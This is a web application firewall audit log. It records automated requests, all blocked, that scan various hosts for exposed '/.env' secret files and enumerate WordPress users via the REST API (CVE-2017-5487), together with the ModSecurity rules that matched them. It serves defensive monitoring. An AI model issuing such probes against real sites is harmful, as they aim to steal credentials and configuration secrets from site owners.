"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749363645725485 705 (- - -) Stopwatch2: 1749363645725485 705; combined=267, p1=232, p2=0, p3=0, p4=0, p5=34, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ff7a14-Z-- --0cad7f2b-A-- [08/Jun/2025:13:51:34 +0700] aEUy9se0OZpePEzoRnpSYQAAAEQ 103.236.140.4 49506 103.236.140.4 8181 --0cad7f2b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --0cad7f2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cad7f2b-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749365494975491 805 (- - -) Stopwatch2: 1749365494975491 805; combined=359, p1=324, p2=0, p3=0, p4=0, p5=34, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cad7f2b-Z-- --c43a6849-A-- [08/Jun/2025:14:09:01 +0700] aEU3DaD1_iznf-QmBECSgQAAAIY 103.236.140.4 49662 103.236.140.4 8181 --c43a6849-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.86.32 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c43a6849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c43a6849-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749366541902073 948 (- - -) Stopwatch2: 1749366541902073 948; combined=380, p1=325, p2=0, p3=0, p4=0, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c43a6849-Z-- --c30e3901-A-- [08/Jun/2025:15:31:22 +0700] aEVKWse0OZpePEzoRnpTFQAAAEw 103.236.140.4 50272 103.236.140.4 8181 --c30e3901-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c30e3901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c30e3901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749371482967094 848 (- - -) Stopwatch2: 1749371482967094 848; combined=357, p1=317, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30e3901-Z-- --64651f7e-A-- [08/Jun/2025:16:34:39 +0700] aEVZL8e0OZpePEzoRnpTiQAAAE8 103.236.140.4 50808 103.236.140.4 8181 --64651f7e-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.150 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.150 Accept-Encoding: gzip X-Varnish: 174643002 --64651f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64651f7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375279713044 927 (- - -) Stopwatch2: 1749375279713044 927; combined=354, p1=315, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64651f7e-Z-- --5874ed4b-A-- [08/Jun/2025:16:39:49 +0700] aEVaZYsoVckF-yt1MVzVoQAAANI 103.236.140.4 50870 103.236.140.4 8181 --5874ed4b-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5874ed4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5874ed4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375589287190 794 (- - -) Stopwatch2: 1749375589287190 794; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5874ed4b-Z-- --e62bc334-A-- [08/Jun/2025:16:42:20 +0700] aEVa_MCyjFxjzV1Pwa01XQAAAAc 103.236.140.4 50926 103.236.140.4 8181 --e62bc334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 Accept-Charset: utf-8 --e62bc334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e62bc334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375740615000 876 (- - -) Stopwatch2: 1749375740615000 876; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e62bc334-Z-- --91aa7f21-A-- [08/Jun/2025:16:53:51 +0700] aEVdr8e0OZpePEzoRnpTkQAAAEs 103.236.140.4 51090 103.236.140.4 8181 --91aa7f21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept-Charset: utf-8 --91aa7f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91aa7f21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376431358322 862 (- - -) Stopwatch2: 1749376431358322 862; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91aa7f21-Z-- --c996051b-A-- [08/Jun/2025:17:01:06 +0700] aEVfYsCyjFxjzV1Pwa01YwAAAAY 103.236.140.4 51122 103.236.140.4 8181 --c996051b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.31 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.31 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c996051b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c996051b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376866610789 779 (- - -) Stopwatch2: 1749376866610789 779; combined=321, p1=284, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c996051b-Z-- --1e86b926-A-- [08/Jun/2025:17:03:19 +0700] aEVf54soVckF-yt1MVzV2gAAAME 103.236.140.4 51182 103.236.140.4 8181 --1e86b926-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.244.132 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1e86b926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e86b926-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376999837676 801 (- - -) Stopwatch2: 1749376999837676 801; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e86b926-Z-- --884d4013-A-- [08/Jun/2025:17:13:33 +0700] aEViTce0OZpePEzoRnpUFwAAAFA 103.236.140.4 54850 103.236.140.4 8181 --884d4013-B-- GET /sites/all/libraries/mailchimp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174 Accept-Charset: utf-8 --884d4013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --884d4013-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749377613877555 592 (- - -) Stopwatch2: 1749377613877555 592; combined=248, p1=223, p2=0, p3=0, p4=0, p5=24, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --884d4013-Z-- --2a97dc3e-A-- [08/Jun/2025:17:16:37 +0700] aEVjBaD1_iznf-QmBECUiAAAAIk 103.236.140.4 57670 103.236.140.4 8181 --2a97dc3e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Accept-Charset: utf-8 --2a97dc3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a97dc3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749377797615129 774 (- - -) Stopwatch2: 1749377797615129 774; combined=335, p1=296, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a97dc3e-Z-- --e9614c4e-A-- [08/Jun/2025:17:50:20 +0700] aEVq7MCyjFxjzV1Pwa03dgAAAAE 103.236.140.4 58904 103.236.140.4 8181 --e9614c4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --e9614c4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9614c4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749379820346387 755 (- - -) Stopwatch2: 1749379820346387 755; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9614c4e-Z-- --2719fa1c-A-- [08/Jun/2025:17:54:11 +0700] aEVr08CyjFxjzV1Pwa03eQAAAAo 103.236.140.4 58964 103.236.140.4 8181 --2719fa1c-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 109.87.213.146 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 109.87.213.146 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --2719fa1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2719fa1c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749380051436836 947 (- - -) Stopwatch2: 1749380051436836 947; combined=539, p1=245, p2=0, p3=0, p4=0, p5=294, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2719fa1c-Z-- --7a1bcc6c-A-- [08/Jun/2025:19:14:45 +0700] aEV-tce0OZpePEzoRnpVbAAAAEo 103.236.140.4 59708 103.236.140.4 8181 --7a1bcc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.0.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.0.80.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7a1bcc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a1bcc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749384885429790 3486 (- - -) Stopwatch2: 1749384885429790 3486; combined=1499, p1=484, p2=974, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a1bcc6c-Z-- --5c025a7a-A-- [08/Jun/2025:19:41:28 +0700] aEWE-KD1_iznf-QmBECVHwAAAI4 103.236.140.4 59894 103.236.140.4 8181 --5c025a7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16G77 Safari/604.1 Accept-Charset: utf-8 --5c025a7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c025a7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386488035082 786 (- - -) Stopwatch2: 1749386488035082 786; combined=339, p1=303, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c025a7a-Z-- --5cb7d571-A-- [08/Jun/2025:19:42:12 +0700] aEWFJKD1_iznf-QmBECVIgAAAIc 103.236.140.4 59904 103.236.140.4 8181 --5cb7d571-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --5cb7d571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb7d571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386532835319 765 (- - -) Stopwatch2: 1749386532835319 765; combined=310, p1=275, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb7d571-Z-- --a928750c-A-- [08/Jun/2025:19:45:13 +0700] aEWF2YsoVckF-yt1MVzZTwAAAMw 103.236.140.4 59940 103.236.140.4 8181 --a928750c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.2.516 Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --a928750c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a928750c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386713454173 844 (- - -) Stopwatch2: 1749386713454173 844; combined=354, p1=311, p2=0, p3=0, p4=0, p5=42, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a928750c-Z-- --4080e83f-A-- [08/Jun/2025:19:52:12 +0700] aEWHfMCyjFxjzV1Pwa033wAAAAY 103.236.140.4 60104 103.236.140.4 8181 --4080e83f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.81.94.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.81.94.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4080e83f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4080e83f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749387132488988 3163 (- - -) Stopwatch2: 1749387132488988 3163; combined=1412, p1=474, p2=906, p3=0, p4=0, p5=31, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4080e83f-Z-- --3530665e-A-- [08/Jun/2025:20:09:22 +0700] aEWLgosoVckF-yt1MVzZcQAAAMg 103.236.140.4 60254 103.236.140.4 8181 --3530665e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.67.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --3530665e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3530665e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388162706893 891 (- - -) Stopwatch2: 1749388162706893 891; combined=365, p1=328, p2=0, p3=0, p4=0, p5=36, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
